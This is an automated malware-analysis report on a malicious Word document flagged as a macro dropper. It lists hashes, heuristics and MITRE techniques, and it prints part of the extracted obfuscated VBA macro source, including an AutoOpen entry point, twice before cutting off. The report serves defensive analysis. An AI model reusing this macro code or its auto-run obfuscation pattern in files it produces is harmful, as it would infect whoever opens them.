Office (OLE) malware analysis — malicious · b0669550c575436e

MALICIOUS

Office (OLE)

169.5 KB Created: 2018-04-26 14:33:00 Authoring application: Microsoft Office Word First seen: 2018-06-14

MD5: 4e1e48b41696481c4cb245140293ef0e SHA-1: 4540a8fa774d2e982ba879de799750d66c52e6c4 SHA-256: b0669550c575436e5a44c93a038c43a8721e77bba685d60d5cef7b8dc523a17f

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The presence of a Shell() call and the ClamAV detection signature 'Doc.Dropper.Agent-6519200-0' strongly indicate that the macros are designed to download and execute a secondary payload. The AutoOpen macro further suggests an immediate execution upon opening the document, typical of a malicious attachment.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6519200-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6519200-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52793 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	52793 bytes
SHA-256: `ce1a15875c8cc653a71324b50de18f3fe93825b77dbc27dd671f962fd0ece23d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zfAnnQJJ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub UFuwFI(BwdcBR) Select Case uYTbtR Case 25512 avkpk = Hex(jjAso - ChrW(fitRDB)) iTYrF = CByte(72325) IjFNZ = iPfwOQ Case 46232 VPckMi = LiCYs ilBEi = Round(6749) AzanS = Log(IPDvCn) End Select End Sub Sub cJDwHs(SwBDo) Select Case ivdduj Case 24757 cVooR = Hex(VpIjz - ChrW(PjZiEz)) wtDwXw = CByte(73504) MmZBT = RzoPHp Case 56921 cnSEDQ = WvZwzQ YWRpf = Round(90789) DjhjK = Log(jkTzHJ) End Select Select Case QQjSv Case 40832 pqzEV = Hex(waRzR - ChrW(ibZEk)) sSLmc = CByte(53946) oFBIqw = KXTMjd Case 20101 zISVf = ajrLvv CMDOX = Round(30276) DzRbzX = Log(LHMVHN) End Select Select Case SDTGwq Case 25971 JzuDr = Hex(LQzLN - ChrW(zCqrWI)) Pbiqoh = CByte(22006) IkIbYU = nUhvfs Case 113 PJtkuQ = bjosw iHFVjX = Round(4590) pjoIPO = Log(JacGP) End Select End Sub Sub PjuzRS(IYnjWm) Select Case NbazU Case 95523 ZZFci = Hex(qSJLm - ChrW(LPaKYO)) GXRwI = CByte(73551) FJiAdl = YpGpU Case 75086 FqPct = atmRBk rnIdw = Round(80802) zhjIi = Log(QmZUU) End Select Select Case boAhB Case 39026 wDLWQ = Hex(sValhd - ChrW(imSYGG)) sWoUSw = CByte(95555) brFGJ = rzmKTJ Case 80840 qAsqcZ = VbbvaV OqEUBj = Round(89744) faTKnp = Log(NnzDOf) End Select End Sub Sub Autoopen() On Error Resume Next Select Case cbUYUF Case 29477 LiMPiv = Hex(wIGkH - ChrW(RXRlz)) OnwWHw = CByte(51002) cAcPp = BOlwY Case 12724 HoowdY = KECmU BqNME = Round(36887) hiwfr = Log(nTDlSN) End Select irAFOphEPzOG (EHzJZd + AKWOjzER + HDYzp) Select Case YSKBZt Case 9548 DdqJFi = Hex(zHSjZb - ChrW(urDma)) AiFApw = CByte(43065) JBMZI = AdIzUv Case 74662 vFNQT = YTzmS zYXqU = Round(15964) PqGFK = Log(jLQjE) End Select End Sub Sub fIsiz(YdJwpD) Select Case GzzbG Case 35197 MiXRpz = Hex(AmBHj - ChrW(UnAEqX)) viCSA = CByte(4127) ERjjJQ = Gwlbt Case 301 YrIoGK = Twslj jhjER = Round(75598) wiCRw = Log(UOqPd) End Select Select Case XSXntd Case 89127 alSqza = Hex(oYQhK - ChrW(jmpoq)) npqcjP = CByte(78543) zMuma = vtNPM Case 38769 RjqZh = qqfhz nHCjI = Round(68014) IODcii = Log(nKmZZ) End Select Select Case WSVJAD Case 3011 wVRfuj = Hex(PtJEjk - ChrW(JNDLv)) fjDGHX = CByte(62462) lsiFh = Ktmzju Case 37525 RdUtr = IHFpH RRRLXX = Round(5433) iAazw = Log(AQbGb) End Select End Sub Sub HHPam(fVMdm) Select Case zHNtba Case 48891 sBtQC = Hex(ulKsj - ChrW(NHSJCq)) JrhGA = CByte(26618) BrrHoA = QIGNzX Case 32975 uKTzn = qoEqlB TKvtC = Round(41197) DtDDf = Log(zwMvD) End Select End Sub Attribute VB_Name = "HqzXmDaAL" Sub nQDzR(zLUwCw) Select Case AGQSV Case 67490 cInStY = Hex(nIqcU - ChrW(BGnAj)) BAAbG = CByte(30870) bzQVk = RTZfc Case 70352 saKCi = hqNuT ... (truncated)

SHA-256: ce1a15875c8cc653a71324b50de18f3fe93825b77dbc27dd671f962fd0ece23d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zfAnnQJJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub UFuwFI(BwdcBR)
Select Case uYTbtR
         Case 25512
            avkpk = Hex(jjAso - ChrW(fitRDB))
            iTYrF = CByte(72325)
            IjFNZ = iPfwOQ
         Case 46232
            VPckMi = LiCYs
            ilBEi = Round(6749)
            AzanS = Log(IPDvCn)
End Select
End Sub
Sub cJDwHs(SwBDo)
Select Case ivdduj
         Case 24757
            cVooR = Hex(VpIjz - ChrW(PjZiEz))
            wtDwXw = CByte(73504)
            MmZBT = RzoPHp
         Case 56921
            cnSEDQ = WvZwzQ
            YWRpf = Round(90789)
            DjhjK = Log(jkTzHJ)
End Select
Select Case QQjSv
         Case 40832
            pqzEV = Hex(waRzR - ChrW(ibZEk))
            sSLmc = CByte(53946)
            oFBIqw = KXTMjd
         Case 20101
            zISVf = ajrLvv
            CMDOX = Round(30276)
            DzRbzX = Log(LHMVHN)
End Select
Select Case SDTGwq
         Case 25971
            JzuDr = Hex(LQzLN - ChrW(zCqrWI))
            Pbiqoh = CByte(22006)
            IkIbYU = nUhvfs
         Case 113
            PJtkuQ = bjosw
            iHFVjX = Round(4590)
            pjoIPO = Log(JacGP)
End Select
End Sub
Sub PjuzRS(IYnjWm)
Select Case NbazU
         Case 95523
            ZZFci = Hex(qSJLm - ChrW(LPaKYO))
            GXRwI = CByte(73551)
            FJiAdl = YpGpU
         Case 75086
            FqPct = atmRBk
            rnIdw = Round(80802)
            zhjIi = Log(QmZUU)
End Select
Select Case boAhB
         Case 39026
            wDLWQ = Hex(sValhd - ChrW(imSYGG))
            sWoUSw = CByte(95555)
            brFGJ = rzmKTJ
         Case 80840
            qAsqcZ = VbbvaV
            OqEUBj = Round(89744)
            faTKnp = Log(NnzDOf)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case cbUYUF
         Case 29477
            LiMPiv = Hex(wIGkH - ChrW(RXRlz))
            OnwWHw = CByte(51002)
            cAcPp = BOlwY
         Case 12724
            HoowdY = KECmU
            BqNME = Round(36887)
            hiwfr = Log(nTDlSN)
End Select
irAFOphEPzOG (EHzJZd + AKWOjzER + HDYzp)
Select Case YSKBZt
         Case 9548
            DdqJFi = Hex(zHSjZb - ChrW(urDma))
            AiFApw = CByte(43065)
            JBMZI = AdIzUv
         Case 74662
            vFNQT = YTzmS
            zYXqU = Round(15964)
            PqGFK = Log(jLQjE)
End Select
End Sub
Sub fIsiz(YdJwpD)
Select Case GzzbG
         Case 35197
            MiXRpz = Hex(AmBHj - ChrW(UnAEqX))
            viCSA = CByte(4127)
            ERjjJQ = Gwlbt
         Case 301
            YrIoGK = Twslj
            jhjER = Round(75598)
            wiCRw = Log(UOqPd)
End Select
Select Case XSXntd
         Case 89127
            alSqza = Hex(oYQhK - ChrW(jmpoq))
            npqcjP = CByte(78543)
            zMuma = vtNPM
         Case 38769
            RjqZh = qqfhz
            nHCjI = Round(68014)
            IODcii = Log(nKmZZ)
End Select
Select Case WSVJAD
         Case 3011
            wVRfuj = Hex(PtJEjk - ChrW(JNDLv))
            fjDGHX = CByte(62462)
            lsiFh = Ktmzju
         Case 37525
            RdUtr = IHFpH
            RRRLXX = Round(5433)
            iAazw = Log(AQbGb)
End Select
End Sub
Sub HHPam(fVMdm)
Select Case zHNtba
         Case 48891
            sBtQC = Hex(ulKsj - ChrW(NHSJCq))
            JrhGA = CByte(26618)
            BrrHoA = QIGNzX
         Case 32975
            uKTzn = qoEqlB
            TKvtC = Round(41197)
            DtDDf = Log(zwMvD)
End Select
End Sub

Attribute VB_Name = "HqzXmDaAL"
Sub nQDzR(zLUwCw)
Select Case AGQSV
         Case 67490
            cInStY = Hex(nIqcU - ChrW(BGnAj))
            BAAbG = CByte(30870)
            bzQVk = RTZfc
         Case 70352
            saKCi = hqNuT
    
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.